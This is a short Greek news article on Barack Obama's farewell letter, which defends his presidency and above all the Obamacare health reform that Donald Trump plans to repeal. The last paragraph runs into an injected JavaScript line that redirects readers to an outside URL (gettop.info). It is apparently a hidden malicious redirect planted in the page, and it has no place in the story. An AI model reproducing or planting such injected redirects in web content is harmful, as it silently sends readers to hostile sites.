Ο Ομπάμα για το Obamacare: Δημιουργήσαμε νέα θεμέλια για την Αμερική

0
10

 

Σε επιστολή του προς τον αμερικανικό λαό ο απερχόμενος πρόεδρος των ΗΠΑ Μπαράκ Ομπάμα υπερασπίστηκε  το έργο που επιτέλεσε στη διάρκεια των δύο θητειών του στην προεδρία και κυρίως το πρόγραμμα ασφάλισης και περίθαλψης, γνωστό και ως Obamacare.

«Καθώς ετοιμάζομαι να δώσω τη σκυτάλη και να κάνω το καθήκον μου ως πολίτης, μπορώ να πω με υπερηφάνεια ότι δημιουργήσαμε νέα θεμέλια για την Αμερική», γράφει ο 44ος πρόεδρος των ΗΠΑ.

Μεταξύ των βασικών επιτευγμάτων της διακυβέρνησής του αναφέρει την ανάκαμψη της αμερικανικής οικονομίας, τον περιορισμό των στρατιωτικών επιχειρήσεων στο Αφγανιστάν και το Ιράκ, τη σημαντική μείωση της εξάρτησης των ΗΠΑ από το ξένο πετρέλαιο και τη συμφωνία του Παρισιού για το κλίμα.

Όμως πρώτη στον κατάλογο με τα επιτεύγματά του βρίσκεται η μεταρρύθμιση του συστήματος υγειονομικής ασφάλισης, γνωστή με την ονομασία Obamacare, την οποία ο Ντόναλντ Τραμπ θέλει να καταργήσει μόλις αναλάβει την προεδρία στις 20 Ιανουαρίου.

Ο απερχόμενος πρόεδρος ξεκίνησε μια προσπάθεια να διασώσει τη μεταρρύθμιση αυτή, κάνοντας μεταξύ άλλων μια σπάνια επίσκεψη στο Κογκρέσο χθες στη διάρκεια της οποίας κάλεσε τους Δημοκρατικούς να υπερασπιστούν τον σχετικό νόμο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here